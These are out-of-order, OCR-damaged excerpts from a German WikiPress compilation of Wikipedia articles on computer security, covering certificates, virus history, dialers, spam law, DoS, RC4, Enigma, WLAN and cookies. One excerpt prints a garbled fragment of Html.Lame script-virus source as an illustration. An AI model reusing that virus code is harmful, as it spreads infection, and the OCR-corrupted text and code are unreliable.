23. PGP und Zertfikate ge Stammzertifizierungsstellen oder im Mozilla Firefox Extras gt Einstellungen gt Erweitert gt Zertifikate gt Zertifikate verwalten Allerdings sind dies oft Firmen von denen man als Benutzer noch nie etwas geh rt hat geschweige denn ihnen vertraut Nat rlich gr n det sich das Vertrauen in diese Stellen darin dass es ihr Gesch ft ist sorgsam mit Zertifikaten umzugehen Dennoch ist es so dass der Webbrowser oder das Mailprogramm automatisch einer Liste von unbekannten Stellen vertraut ohne dass der Benutzer Informationen dar ber hat wo sich diese Firmen befinden nach welchen Regeln sie Zertifikate erstellen oder wie die Registrierung abl uft Man gr ndet sein Vertrauen in digitale Unterschriften implizit auf unbekannte Stel len Ein zweites Problem ist dass dem Zertifikat selbst nur schwer anzu sehen ist unter welchen Qualit tsanspr chen die Registrierung zustande gekommen ist Abschreckendes Beispiel ist die Ausstellung von Micro soft Zertifikaten durch VeriSign an Personen die sich f lschlicherweise als Microsoft Mitarbeiter ausgegeben hatten Mit diesen Zertifikaten hat ten die Betr ger nun eine vertrauensw rdige Garantie dass sie zur Firma Microsoft geh ren Es w re z B m glich gewesen authentische Mails im Namen von Microsoft zu verschicken oder signierten Programmcode im Namen von Microsoft ausf hren zu lassen Obwohl diese Zertifikate sofort zur ckgezogen wur
24. PalmOS und f r Flash Mit dem W95 CIH 10xx verbreitete sich 1998 das erste Virus das ne ben dem L schen der Festplatte auch das BIOS zerst ren konnte Somit war der gesamte PC unbrauchbar bis durch Fachleute mit geeigneter Hardwareausstattung in den BIOS Flash EEPROM Baustein ein neues BIOS geschrieben wurde 42 Computervirus Am Ende dieser ra tauchten wieder wie in der DOS ra die komple xesten Viren auf die es bis zu dieser Zeit gab Beispiele sind Win32 Meta PHOR oder Win32 ZMist die sehr stark metamorph sind und nicht von allen Antivirenprogrammherstellern vollst ndig entdeckt werden k n nen Neue Nischen Ab 2002 Ungef hr ab 2002 traten Viren mehr und mehrin den Hintergrund und wurden durch W rmer ersetzt Die Entwicklung von Viren geht trotzdem weiter und bezieht sich vor allem auf neue Nischen Im Jahr 2002 wurde das erste Virus geschrieben das sowohl Win32 Anwendungen als auch ELF Dateien z B Linux Anwendungen infizie ren konnte Dieses Virus kann als das Einl uten eines neuen Zeitalters der Viren gesehen werden Im Jahr 2004 brach dann endg ltig eine neue ra f r Viren an Das erste Virus f r PocketPCs mit dem Betriebssystem Windows CE tauchte auf und zeigte dass auch diese viel verwendeten Kommunikationsger te nicht verschont werden Einige Monate sp ter wurde das Virus Win64 Rugrad entdeckt Dieses Virus konnte die Anwendungen der neu erschienenen Microsoft Win dows XP 64 bit Edition in
25. Satz erkl rt J Sofern vorhanden muss die Netzwerkadresse erhalten bleiben die im Dokument als ffentlicher Zugang zu einer transparenten Kopie des Dokuments angegeben ist sowie die im Dokument angegebenen Netzwerkadressen fr herer Versionen auf denen es basiert Diese Angaben k nnen im Abschnitt Historie erscheinen Sie k nnen eine Netzwerkadresse weglassen wenn sie sich auf ein Werk bezieht das mindestens vier Jahre vor dem Dokument selbst ver ffentlicht wurde oder wenn der urspr ngliche Herausgeber der Version auf die sie sich bezieht seine Erlaubnis dazu erteilt K F r alle mit Danksagungen oder Widmungen berschriebenen Abschnitte muss der Titel erhalten bleiben ebenso wie der ganze Inhalt und Tonfall aller Danksagungen und oder Widmungen der beteiligten Mitarbeiter L Alle unver nderlichen Abschnitte des Dokuments m ssen erhalten bleiben unver ndert in Titel und Wortlaut Abschnittsnummern oder dergleichen gelten hierbei nicht als Teil des Titels M L schen Sie alle mit Empfehlungen berschriebenen Abschnitte Ein solcher Abschnitt darf nicht in der modifizierten Version enthalten sein N Benennen Sie keinen vorhandenen Abschnitt in Empfehlungen oder in einen Titel um der mit einem unver nderlichen Abschnitt in Widerspruch steht O Bewahren Sie alle Haftungsausschl sse mo m zo Wenn die modifizierte Version neue Vorspannabschnitte oder Anh nge enth lt die als sekund re Abschnit
26. Sperrung von Dialern Auskunftsanspruch des Verbrauchers gegen ber der Bundesnetzagentur 111 Software Am 4 M rz 2004 entschied der Bundesgerichtshof dass f r Dialernut zung anfallende Geb hren nicht gezahlt werden m ssen wenn der Dialer unwissentlich benutzt wurde und gewisse Sicherheitsvorkehrungen ein gehalten wurden Aktenzeichen III ZR 96 03 Mit Urteil vom 28 Juli 2005 hat der Bundesgerichtshof erneut die Position der Verbraucher gest rkt Aktenzeichen III ZR 3 05 indem er dem Verbindungsnetzbetreiber einen eigenen Anspruch auf ein Entgelt absprach In einem weiteren Urteil vom 20 Oktober 2005 hat der Bundesgerichts hof die Rechtsprechung konsequent weiter entwickelt Aktenzeichen III ZR 37 05 indem er dem Nutzer einen R ckzahlungsanspruch auf sein Entgelt zusprach wenn dieser gegen ber dem Verbindungsnetzbetreiber unter Vorbehalt gezahlt hatte Schwachstellen der gesetzlichen Regelungen Die gesetzlichen Regelungen erschweren das missbr uchliche Installieren von Dialern etwas haben allerdings viele prinzipielle Schwachstellen Registrierung von Anw hlprogrammen Was ein Anw hlprogramm macht l sst sich durch Ansehen des Dialers nicht feststellen Das Verhalten kann von vielen Parametern abh ngig gemacht werden Datum IP Adresse CPU RAM Ausbau Anzahl der Nutzer Nut zungsdauer Vorhandensein von URLs im Internet und sich bei der Registrierungsbeh rde zahm verhalten Selbst wenn man die Quelle
27. anonym 12 1 06 1 2 06 WikiPress Redaktion Zertifikatsperrliste Eine Zertifikatsperrliste engl Certificate Revocation List CRL ist eine Liste die Informationen ber die G ltigkeit von Zertifikaten enth lt Sie erm glicht es festzustellen ob ein Zertifikat zum aktuellen Zeitpunkt g ltig ist ob es gesperrt widerrufen wurde und warum Solche Sperrlisten dienen vor allem dazu Schl ssel zu sperren wider rufen die nicht mehr sicher sind weil sie in falsche H nde geraten sind oder geknackt wurden in solchen F llen muss das Zertifikat noch vor dem eigentlichen Ablaufdatum gesperrt werden damit der Schl ssel nicht weiter verwendet wird Sie sind daher ein wichtiger Teil der Public Key Infrastructure Eine Sperre engl hold ist tempor r und kann aufgehoben werden z B wenn man nicht sicher ist ob der private Schl ssel verloren kompro mittiert ist man aber sicher gehen will ein Widerruf engl revocation ist endg ltig Erkl rt eine Zertifizierungsstelle ein Zertifikat oder mehrere f r ung ltig tr gt es die Seriennummer dieses Schl ssels in die Certificate Revocation List ein Diese wird immer dann abgefragt wenn ein Pro gramm bei der Zertifizierungsstelle anfragt ob ein bestimmtes Zertifikat 152 Zertifikatsperrliste g ltig ist was vor jeder Verwendung des Schl ssels geschehen sollte Die Sperrliste ist zum Schutz vor Manipulation selbst durch eine digitale Sig natur gesichert Somit ka
28. bei dessen Entwicklung gro es Au genmerk auf sichere Verschl sselungsalgorithmen gelegt wurde ist PW Manager Quelle http de wikipedia org wiki Kennwort Historie 10 2 03 Angelegt von Smurf danach bearbeitet von den Hauptautoren Hajile Smurf Wimmerm M5 Peng Head Steven Malkovich Rdoering Tilo Matt1971 Learny Rodolfo4711 Achim Raschka Peacemaker Hanno Behrens Cat MartinC Ingo B Chrkl Lukian Djj Michaelsy Guety Zwobot Cp trump FlaBot anonym 12 1 06 1 2 06 WikiPress Redaktion RC4 RC4 Ron s Cipher 4 ist ein f r Software optimierter symmetrischer Stromchiffrierer welcher zur Verschliisselung von Daten eingesetzt wird Er wurde 1987 von Ronald L Rivest f r RSA Data Security Inc heute RSA Security entwickelt Der Algorithmus war sieben Jahre lang geheim security by obscuri ty bis 1994 der Quellcode anonym ver ffentlicht wurde RC4 hat im Gegensatz zu DES eine variable Schl ssell nge Die Schl ssell nge kann bis zu 2048 Bit betragen RC4 verschl sselt immer ein Byte auf einmal Er besteht aus einer so genannten S Box die sich w hrend der Verschl s selung fortlaufend andert Diese wird durch ein Passwort initialisiert das fiir jede Verschliisselung einmalig sein muss Jedes Klartextzeichen wird XOR mit einem bestimmten vom Passwort abh ngigen Zeichen aus der S BOX verkniipft Theoretisch sind somit ca 2 hoch 1700 verschiedene Zust nde m glich 290 Brute Force Methode
29. drei weitere Walzen eingesetzt VI VII und VIII die mehr als eine namlich zwei Uber tragskerben aufweisen Man fragt sich warum nicht deutlich mehr Die exklusiv von der Marine ver wendeten drei Walzen vermieden Abb 37 Walzensatz Links unten ist eine brigens einen weiteren Fehler der Ubertragskerbe zu erkennen f nf Walzen der Enigma I denn sie hatten ihre bertragskerben alle bei identischen Buchstaben Nicht so die Walzen Ibis V die dank ihrer bei un terschiedlichen Buchstaben angeordneten Kerben durch Beobachten einer Krabbe viel leichter identifizierbar waren Die deutsche Abwehr Geheimdienst verwendete brigens ein Enig ma Modell das ber einen exklusiven Walzensatz verf gte bei dem die drei Walzen tats chlich mehrere bertragskerben aufwiesen n mlich 11 15 beziehungsweise 17 Kerben Selbst die Umkehrwalze war im Un terschied zu den anderen Enigma Modellen drehbar und rotierte mit Dies st rkte die Verschl sselung und sorgte sicher auch daf r dass an dere deutsche Stellen nicht mitlesen konnten Allerdings verzichtete die Abwehr bei dieser besonders kompakten und handwerklich hervorragend 315 Kryptografie gebauten Enigma auf ein Steckerbrett Folge war dass es den Codekna ckern von Bletchley Park an der Spitze Dillwyn Dilly Knox gelang auch diese Verschl sselung zu berwinden und so dazu beizutragen dass deutsche Agenten bereits bei ihrer Einreise in Empfang genommen wer den
30. f nger zu benennen Die Nachricht selbst muss nur einmal bertragen werden Der Server k mmert sich dann um den weiteren Versand Allerdings hat dank Realtime Blackhole Lists die Zahl offener Re lays inzwischen stark abgenommen Die meisten Mailserver werden im Interesse der eigenen Funktionalit t mittlerweile sinnvoll konfiguriert und erm glichen diesen einfachen Versand nicht mehr Dann kann der Spammer seine Werbung auch direkt von seinem Rechner an Mailserver versenden Ursache daf r ist dass das Simple Mail Transfer Protocol es je dem erm glicht von jedem Rechner der Welt aus ohne Authentifizierung Nachrichten an Empf nger auf diesem Server zu versenden Auswirkungen Spam verursacht im System der weltweiten E Mail Kommunikation einen erheblichen Schaden Da heutzutage kaum mehr ungest rter E Mail Empfang m glich ist wird angenommen dass immer mehr Nutzer die Kommunikation per E Mail meiden und auf weniger st ranf llige Kommunikationsformen ausweichen selbst wenn diese we niger komfortabel sind 194 Spam Spam verursacht Kosten durch verlorene Arbeitszeit die durch das Aussortieren und Lesen von Spam entf llt Typischerweise haben Mailboxen und E Mail Clients ein Gr enlimit Sobald dieses erreicht wurde werden keine weiteren Nachrichten angenommen und der Empfang von weiteren E Mails blo ckiert durch die Beschaffung neuer und oftmals schnell veralteter Filter software und hardware Da Spamfilter in alle
31. ftlichen Verkehr Der Spammer darf also auch keinem Dritten mehr unerw nschte Werbung zusenden W rde er dabei erwischt droht ihm die Zahlung eines Ordnungsgeldes an die Staatskasse oder sogar Ordnungshaft Tats chlich wurden schon Ordnungsgelder gegen Spammer verh ngt Haftungsrecht Weniger umfassend daf r individuell sch tzend und ohne Wettbewerber Position l sst sich auch aus dem allgemeinen Haf tungsrecht ein Unterlassungsanspruch gegen ber dem Spammer herlei ten Er konstruiert sich wie jeder Unterlassungsanspruch in diesem Be reich aus den 1004 analog und 823 Abs 1 BGB F r Privatanwender wird dann auf das allgemeine Pers nlichkeits recht das sich aus dem Grundgesetz herleitet rekurriert der gesch ftliche Anwender sieht einen ebenfalls grundrechtlich gesch tzten Eingriff in den eingerichteten und ausge bten Gewerbebetrieb Beides sind sonstige Rechte im Sinne des 823 Abs 1 BGB Strafrecht Vermehrt wird in letzter Zeit auch diskutiert den Absender von unerw nschter Werbe E Mail strafrechtlich zu verfolgen Einen Ansatz lieferte dazu die Dissertation Zur strafrechtlichen Bew ltigung des Spamming von Thomas Frank Eine Zusammenfassung davon war in Computer und Recht 2 2004 S 123ff abgedruckt Allerdings ist die Rechtsprechung dazu noch uneinheitlich insbesondere sehen die Staats anwaltschaften derzeit noch keinen Handlungsbedarf Anti Spam Gesetz Der Deutsche Bundestag hat am 17 Februar 2005 in
32. gemacht und an das Wiedergabeprogramm weitergegeben In Zukunft k nnen Hardwaresysteme wie das TPM der Trusted Computing Group verwendet werden um die Einhaltung der Rechte zu gew hrleisten Rechtlicher Rahmen Die Wirksamkeit solcher Systeme wird h ufig durch nationale Gesetze erweitert Inden USA wurde zu diesem Zweck der Digital Millennium Co pyright Act DMCA verabschiedet Dieses Gesetz verbietet die Umgehung solcher Systeme unter Androhung von Geldstrafen und oder Freiheitsent zug je festgestelltem Einzelfall 130 Digital Rights Management Auch in Deutschland 1 und 2 Korb der Urheberrechtsnovelle und der EU Informationsrichtlinie wurde die Rechtsgrundlage in diesem Sin ne versch rft so dass nun die Umgehung von Schutzmechanismen unter Strafe gestellt werden kann In Deutschland wurde die h chst umstrittene Regelung eingef hrt dass das Umgehen von Schutzmechanismen zwar zivilrechtlich verboten ist der Besitz entsprechender Dateien jedoch nicht Dies steht im Widerspruch zur Schrankenbestimmung welche das Recht auf Privatkopien einr umt Kritik Kritiker interpretieren die Abk rzung DRM gern als Digital Restrictions Management digitale Beschr nkungsverwaltung da die Rechte der Be nutzer erheblich eingeschr nkt werden k nnen ohne dass f r den Benut zer ein direkter Nutzen daraus entsteht Ger te werden weniger kundenfreundlich Es k nnen Schwierigkeiten beim Abspielen neuerer oder inkompat
33. hren seiner Angriffe bringen Funktionsweise Primitive DoS Angriffe belasten die Dienste eines Servers beispielsweise HTTP mit einer gr eren Anzahl Anfragen als dieser in der Lage ist zu bearbeiten woraufhin er eingestellt wird oder regul re Anfragen so lang sam beantwortet dass diese abgebrochen werden Wesentlich effizienter ist es jedoch Programmfehler auszunutzen um eine Fehlerfunktion wie einen Absturz der Serversoftware auszul sen worauf diese ebenso auf Anfragen nicht mehr reagiert Eine besondere Form stellt die DRDoS Distributed Reflected Denial of Service Attacke dar Hierbei adressiert der Angreifer seine Datenpakete nicht direkt an das Opfer sondern an regular arbeitende Internetdienste tragt jedoch als Absenderadresse die des Opfers ein IP Spoofing Die Antworten auf diese Anfragen stellen dann fiir das Opfer den eigentlichen DoS Angriff dar Der Ursprung des Angriffs ist fiir den Angegriffenen durch diese Vorgehensweise praktisch nicht mehr ermittelbar Im Unterschied zu anderen Angriffen will der Angreifer hier norma lerweise nicht in den Computer eindringen und ben tigt deshalb keine Passw rter oder hnliches Jedoch kann ein DoS Angriff Bestandteil ei nes Angriffs auf ein System sein z B bei folgenden Szenarien Um vom eigentlichen Angriff auf ein System abzulenken wird ein an deres System durch einen DoS lahmgelegt Dies soll daf r sorgen dass das mit der Administration betraute Personal vom ei
34. ltnism ig leicht durch beabsichtigte Modifikation einen Datenstrom zu erzeugen der den gleichen CRC Wert wie eine gegebene Nachricht hat Wenn eine solche Sicherheit gefordert ist m ssen krypto grafische Hash Funktionen wie z B MD5 zum Einsatz kommen Verfahren CRC beruht auf Polynomdivision Die Folge der zu bertragenden Bits wird als dyadisches Polynom betrachtet Beispiel Die Bitfolge 10011101 entspricht dem Polynom 1x7 FOX EOC FIL FIP 1x Ox x8 N t x44 42741 Die Bitfolge der Coderepr sentation der Daten wird durch ein vorher fest zulegendes Generatorpolynom das CRC Polynom mod 2 dividiert wobei ein Rest bleibt Dieser Rest ist der CRC Wert Bei der Ubertragung des Datenblocks hangt man den CRC Wert an den originalen Datenblock an und tibertragt ihn mit Um zu verifizieren dass die Daten keinen Fehler beinhalten wird der empfangene Datenblock mit angehangtem CRC Wert als Binarfolge in terpretiert erneut durch das CRC Polynom mod 2 geteilt und der Rest ermittelt Wenn kein Rest bleibt ist entweder kein Fehler aufgetreten oder es ist ein Fehler aufgetreten der in Polynomdarstellung das CRC Poly nom als Faktor hat Die Daten bertragung erfordert bestimmte unerl ssliche Uberein kommen Zum einen muss dem Empf nger bewusst sein dass berhaupt 259 WLAN eine gesicherte bertragung der Ursprungsdaten stattfinden soll An der Art des eintreffenden Datenstromes allein ist dies nicht zu erkennen Des
35. schon t glich berichten die Medien ber neue Viren W rmer oder sonsti ge Betr gereien im Internet Dieses Buch Dieses Handbuch enth lt ausgew hlte Artikel der Wikipedia die helfen sollen grundlegende Fach Begriffe auseinander zu halten und zu ver stehen Neben bekannten Angriffsformen werden auch einige bekannte Viren einfach und verst ndlich erkl rt Es werden M glichkeiten gezeigt wie ein Anwender sich sch tzen kann und was die Hardware der nahen Zukunft f r ihn leisten kann Es wird kurz darauf eingegangen wie die Sicherheit im Internet gew hrleistet werden kann und wo die Schw chen dieser L sung sein k nnten Auch der Bereich drahtloses Internet wird dabei nicht zu kurz kommen Den Abschluss bilden die Ver und Ent schl sselung in Theorie und Geschichte Dabei wird dem Leser auffallen dass manche der Kapitel von der Struktur abweichen die er von anderen Sachb chern gewohnt ist Auch mag er unterschiedliche Gewichtungen finden Einige Artikel sind relativ kurz andere deutlich ausf hrlicher Er wird Wiederholungen und ber schneidungen finden Dies h ngt in erster Linie mit der Entstehung der Artikel in der Wikipedia zusammen Hier werden Artikel von tausenden Freiwilligen zusammengestellt und berarbeitet die ein Interesse an der Erstellung einer frei verf gbaren Enzyklop die haben Vor allem vor diesem Hintergrund erhebt dieses Buch nicht den An spruch auf Vollst ndigkeit Auch ein einheitlicher Sti
36. sondern die unkontrollierte Ausf hrung des Schadprogramms Dateiarten deren Ausf hrbarkeit dem Opfer nicht bewusst ist Die Aus f hrbarkeit von exe Dateien unter Windows ist vielen Anwendern be 51 Viren W rmer Trojaner kannt Es gibt aber einige Dateiarten bei denen dies nicht so gut bekannt ist Wurm Programmierer spekulieren deshalb darauf dass diese Dateien nicht mit derselben Vorsicht wie exe Dateien behandelt und dadurch leichtfertig zur Ausf hrung gebracht werden Beispiele sind Dateien mit der Endung scr f r gew hnlich Bild schirmschoner f r Windows Dateien mit der Endung pif norma lerweise DOS Datei Verkn pfungen Dateien mit der Endung vbs Visual Basic Script Dateien oder Dateien mit der Endung bat DOS Batch Dateien Codierung in f r Antivirenprogramme unzug ngliche Formate Oft wer den W rmer in ZIP Archive verpackt um es Virenscannern zu erschwe ren den Wurm zu entdecken Zum Teil sind diese ZIP Archive mit einem Passwort verschl sselt das sich im E Mail Text befindet Dadurch wird es Virenscannern nahezu unm glich gemacht den Inhalt des Anhangs zu analysieren Gleichzeitig erh ht es die Neugier des Anwenders der Pass wortschutz ist also auch Teil des Social Engineering Automatisches Ausf hren Die Verbreitung der meisten W rmer ist davon abh ngig den Anwender zu Aktionen zu veranlassen ber de ren Konsequenzen er sich nicht im Klaren ist Im Al
37. von seinen Entwicklern Rijndael genannt benutzt zumeist nur 128 Bit und gilt nach wie vor als unknackbar Die Gr e des Schl sselraums ist jedoch nur eine notwendige aber keine hinreichende Bedingung f r die Sicherheit eines kryptografischen Verfahrens Selbst eine so simple Methode wie eine einfache monoalpha betische Substitution verf gt ber einen Schl sselraum von 26 das ist grob 4000 10 und entspricht ungef hr 88 Bit und ist folglich sogar um etwa den Faktor 2000 gr er als bei der Enigma I Dennoch wird niemand behaupten eine monoalphabetische Substitition w re sicher Auch bei der Enigma hnelt die wesentlich zur Gr e des Schl ssel raums beitragende konstruktive Komponente n mlich das Steckerbrett einer einfachen monoalphabetischen Substitution denn die Steckerung bleibt ja w hrend der gesamten Verschl sselung unver ndert Das Ste ckerbrett kann folglich mit Hilfe einer intelligenten kryptanalytischen Angriffsmethode Turing Bombe berwunden und praktisch g nzlich eliminiert werden Damit kann der Faktor 150 738 274 937 250 bei der Be rechnung des Schl sselraums effektiv wieder gestrichen werden Auch die Ringe bewirken kryptografisch nur eine geringe St rkung des Verfahrens Sie verhinderten haupts chlich dass durch Ablesen der von au en sicht baren Grundstellung auf die wahre Drehposition der Walzen geschlossen werden konnte und dienten somit in erster Linie dem Schutz vor Spionage Damit kann man a
38. vorliegen hat sind solche versteckten Funktionen nicht immer einfach oder zuverl ssig zu finden Das Anwahlprogramm kann nachtr glich modifiziert werden Texte sind bei Nichtstandardeinstellungen betreffs Schriften Schrift gr en und erlaubten Scripting Sprachen h ufig nur teilweise und un vollst ndig lesbar Strafrechtlicher Aspekt Unabh ngig von der Kritik der Regelungen im Telekommunikations recht bleibt die strafrechtliche Bewertung In F lling Rath Internet Dialer Eine strafrechtliche Untersuchung JuS 2005 Heft 7 Seite 598 ff kommen die Autoren zu dem Ergebnis dass bei den am h ufigsten verwendeten Dialer Tricks Betrug gem 263 StGB zu bejahen ist Das Amtsgericht Hamburg kommt ebenfalls zu dem Ergebnis dass Dialer Missbrauch Betrug ist und hat dementsprechend am 16 12 2005 zwei Angeklagte wegen gewerbsm igen Betrugs und Datenver nderung zu 112 Palladium einer Freiheitsstrafe von zwei Jahren sowie von einem Jahr und sechs Monaten zur Bew hrung und Geldbu en von insgesamt 2 1 Millionen Euro verurteilt Wenn der Einsatz eines Dialers Betrug darstellen kann dann liegt eine Vortat gem 261 StGB vor so dass die Einziehung der Forderung den objektiven Tatbestand der Geldw sche erf llen k nnte Die Rechtspre chung hat ber diese Frage noch nicht entschieden Einschl gige Ermitt lungsverfahren sind noch nicht abgeschlossen Ein vergleichbares Problem gibt es beim Handypayment Quelle http
39. 1 Mit dieser Headerzeile sendet der Webserver einen Cookie mit dem Na men letzteSuche und dem Wert cookie aufbau an den Brow ser Der Cookie soll am 29 M rz 2005 oder in 30 Tagen 2 592 000 30 24 60 60 Sekunden gel scht werden Der Browser sollte ihn nur mit Anfragen zur ckschicken deren Pfad mit cgi suche py anf ngt und an diesen Server gerichtet sind Der Client schickt Cookies durch die Angabe von Cookie demNamen und Wert sowie mit den jeweiligen Attributen mit vorangestelltem Cookie letzteSuche cookie aufbau Path cgi suche py Version 1 167 Sonstige Themen Browseranforderungen Nach RFC 2965 soll ein Browser Folgendes un terst tzen Es sollen insgesamt mindestens 300 Cookies gespeichert werden k nnen Es sollen pro Domain mindestens 20 Cookies gespeichert werden k nnen Ein Cookie soll mindestens 4 096 Bytes enthalten k nnen Manche Browser k nnen mehr Cookies und oder auch Cookies mit l n geren Zeichenketteninhalten verarbeiten garantiert ist dies aber nicht Andersherum halten sich auch nicht alle Browser an alle Anforderungen als Webdesigner sollte man sich also auch bei Unterschreitung der Anfor derungen nicht auf der sicheren Seite w hnen Quelle http de wikipedia org wiki HTTP Cookie Historie 23 1 03 Angelegt von Norri danach bearbeitet von den Hauptautoren Diddi Thoken Julian TheK Norri Matth us Wander Jailbird Karl Henner Benji Weyf Hubi PatriceNeff John Doe
40. 12 04 Anonym angelegt danach anonym bearbeitet 12 1 06 1 2 06 WikiPress Redaktion Linkvirus Unter einem Linkvirus versteht man eine bestimmte Gruppe von Com puterviren Sie zeichnen sich dadurch aus dass sie sich an bereits vorhan dene Programme anh ngen und immer zusammen mit dem infizierten Programm gestartet werden Linkviren f gen ihren eigenen Code an das Ende eines Programmes ein und versehen die Startroutine des infizierten Programmes mit einem Link auf ihren eigenen sch dlichen Code daher der Name Linkvirus 46 TSR Virus Oft lassen diese Viren das infizierte Programm nach ihrem eigenen Auf ruf weiterlaufen damit die Infektion m glichst lang nicht bemerkt wird G ngige Virenscanner sollten die angeh ngten Codestellen der Link viren in infizierten Programmen erkennen und entfernen k nnen Irrepa rable Sch den entstehen wenn der Code des infizierten Programmes durch den Virus ersetzt wurde Ansonsten kann der Code einfach entfernt wer den Um eine Infektion erfolgreich durchf hren zu k nnen muss der Virus sich au erdem Schreibzugriff auf das Programm verschaffen Ein Virens canner sollte so einen versuchten Zugriff bemerken und vereiteln k nnen Quelle http de wikipedia org wiki Linkvirus Historie 8 4 05 Angelegt von Prometeus danach bear beitet von den Hauptautoren Prometeus MichaelDiederich 12 1 06 1 2 06 WikiPress Redaktion Makrovirus Makroviren sind Computerviren die nicht als compi
41. 509 v3 Zertifikatstandards wie in RFC 3280 definiert Zertifikate Ein von einer Zertifizierungsstelle ausgestelltes digitales Zertifikat wird im X 509 System immer an einen Distinguished Name oder einen Alternative Name wie eine E Mail Adresse oder einen DNS Eintrag gebunden Nahezu alle Webbrowser beinhalten eine vorkonfigurierte Liste von vertrauensw rdigen CAs deren ausgestellten SSL Zertifikaten der Brow ser vertraut Obwohl grunds tzlich f r den Benutzer die M glichkeit besteht diese Liste zu bearbeiten wird in den allerwenigsten F llen Ge brauch von dieser M glichkeit gemacht 150 X 509 X 509 beinhaltet au erdem einen Standard Zertifikate seitens der CA wieder ung ltig zu machen indem die CA ung ltige Zertifikate in Zer tifikatsperrlisten engl Certificate Revocation List CRL f hrt Struktur eines X 509 v3 Zertifikats Zertifikat Version Seriennummer Algorithmen ID Aussteller G ltigkeit von bis Subject Subject Public Key Info Public Key Algorithmus Subject Public Key Eindeutige ID des Ausstellers optional Eindeutige ID des Inhabers optional Erweiterungen Zertifikat Signaturalgorithmus Zertifikat Signatur Herausgeber und Inhaber ID wurden in Version 2 eingef hrt Erweite rungen in Version 3 Dateinamenserweiterungen f r Zertifikate Ubliche Dateinamenser weiterungen fiir X 509 Zertifi
42. Austausch der Firmware mit WPA2 Unterst tzung nachr sten Jedoch erfolgt hier meist die Ver schl sselung ohne Hardwarebeschleunigung so dass diese Zugewinne an Sicherheit durch starke Einbu en bei der Geschwindigkeit erkauft wer den Eine alternative Herangehensweise besteht darin die Verschl sse lung komplett auf IP Ebene zu verlagern Hierbei wird der Datenverkehr beispielsweise durch die Verwendung von IPsec oder auch durch einen VPN Tunnel gesch tzt Besonders in freien Funknetzen werden so die Inkompatibilit ten verschiedener Hardware umgangen eine zentrale Benutzerverwaltung vermieden und der offene Charakter des Netzes ge wahrt Beim so genannten WarWalking werden mit einem WLAN f higen Notebook oder PDA offene WLAN Netze gesucht Diese werden dann mit Kreide markiert WarChalking Das Ziel ist hierbei Sicherheitsl cken aufzudecken und dem Betreiber zu melden F hrt man bei der Suche eines WLAN Netzes mit einem Auto so spricht man von WarDriving Authentifizierung Extensible Authentication Protocol ist ein Protokoll zur Authentifizierung von Clients Es kann zur Nutzerverwaltung auf RADIUS Server zur ckgreifen EAP wird haupts chlich innerhalb von WPA f r gr ere WLAN Installationen eingesetzt Gesundheit Die von WLAN Ger ten benutzten Funkfrequenzen liegen um 2 4GHz im Mikrowellenbereich Es herrscht allgemein Unsicherheit dar ber ob die Strahlungsleistungen die von Mobilfunk oder WLAN Ger ten aus geh
43. B Compu terviren Trojanische Pferde Exploits durch fehlende Ethik und durch fehlendes umfassendes technisches Verst ndnis Skriptkiddies sind z B jugendliche Benutzer die mit bescheidenen Programmier und Computerkenntnissen durch wahllose Attacken auf zuf llig ausgew hlte IP Adressen andere Anwender von Datennetzen nerven 170 Cracker Dieser Begriff wird jedoch oft auch von anderen Subkulturen aufgegrif fen die damit eine eher junge Person beschreiben die mit Skriptsprachen wie etwa PHP oder Perl arbeiten und damit kleine Programme schrei ben sich aber noch nicht an gro e Framework Projekte herantrauen Quelle http de wikipedia org wiki Skriptkiddie Historie 25 1 04 Angelegt von Klaus Rilling danach bearbeitet von den Hauptautoren Klaus Rilling Matth us Wander Mathias Schindler Caliga anonym 12 1 06 1 2 06 WikiPress Redaktion Cracker Der Begriff Cracker hat im Computerbereich zwei Bedeutungen Seit An fang der 1980er Jahre steht er f r jemanden der kompilierten Software code manipuliert Mitte der 1980er erhielt der Begriff nach und nach seine zweite Bedeutung die schlie lich 1990 durch das Jargonfile der Hacker Community einen offiziellen Charakter erhielt Der Begriff Cracker wird seither zus tzlich als Synonym f r einen destruktiven Hacker ver wendet Software Cracker Als Cracker wird jemand bezeichnet der die Funktion einer Software durch gezielte Manipulation des kompil
44. Bew hrung verurteilt Aus unerw nschter E Mail Werbung kann sowohl ein wettbewerbs rechtlicher als auch ein privatrechtlicher Unterlassungsanspruch des Empf ngers an den Versender erwachsen Es ist dabei unerheblich ob und wie h ufig der Spammer schon spammte Ein Unterlassungsanspruch ent steht ab der ersten E Mail Wettbewerbsrecht Nach st ndiger Rechtsprechung der Instanzgerichte und mittlerweile auch des BGH BGH Urteil vom 11 M rz 2004 AZ I ZR 81 01 zum alten Gesetz gegen den unlauteren Wettbewerb UWG ist eine Zusendung von unerw nschten Werbe E Mails nach den glei chen Grunds tzen sitten und damit wettbewerbswidrig die schon auf die Werbung per Telex Telefax und Telefon angenommen wurden Demzufolge ist es dem Empf nger nicht zuzumuten Werbung in deren Empfang er nicht eingewilligt hat tolerieren zu m ssen wenn dadurch auf Seiten des Empf ngers Kosten und oder eine sonstige St rung entstehen Das neue UWG seit 2004 regelt unmissverst ndlich die Anspr che die an E Mail Werbung gestellt werden damit sie wettbewerbsrechtlich einwandfrei ist Dazu geh rt insbesondere dass der Empf nger in die Zu sendung von Werbung per E Mail vorher eingewilligt hat Unterlassungs anspr che aus dem UWG stehen allerdings nur Wettbewerbern des Spam mers zu auch wenn der Begriff Wettbewerber weit ausgelegt wird Daf r wirkt ein wettbewerbsrechtlicher Unterlassungsanspruch auf den gesamten 203 Sonstige Themen gesch
45. Bumblebee Uc gt lt title gt Html Lame virus lt title gt lt head gt lt hody gt lt SCRIPT lenguage JavaScript Lame gt lt Larme i function Lame j ff Html Lame virus ff Coded by Burblebee Uc ff This is a research virus Do not distribute var NS navigator appName Netscape if NS var d day d new Datei day d getlTlDate if day 9 document write lt p gt lt b gt This file is infected by Html Lame lt br gt document write What a virus lt b gt lt p gt return var protos location protocol file Abb 2 Teil des Source Codes von Html Lame einem Skriptvirus das HTML Dateien infiziert 31 Viren W rmer Trojaner Im Falle von HTML Dateien f gt sich das Skriptvirus in einen speziellen Bereich einer HTML Datei ein oder erzeugt diesen der Skripten enth lt die die meisten Browser beim Laden des HTML Dokuments ausf hren Diese speziellen Skriptviren verhalten sich also fast genauso wie die oben beschriebenen Makroviren Unix Mac OS X und Linux Systeme benutzen f r sehr viele Aufga ben Skripten die z B f r eine Unix Shell wie bash in Perl oder in Python geschrieben sind Auch f r diese Skriptsprachen gibt es Viren die aller dings nur Laborcharakter haben und in der freien Wildbahn so gut wie nicht anzutreffen sind Auch k nnen sie nicht wie in HTML eingebettete Skriptviren versehentlich eingefangen 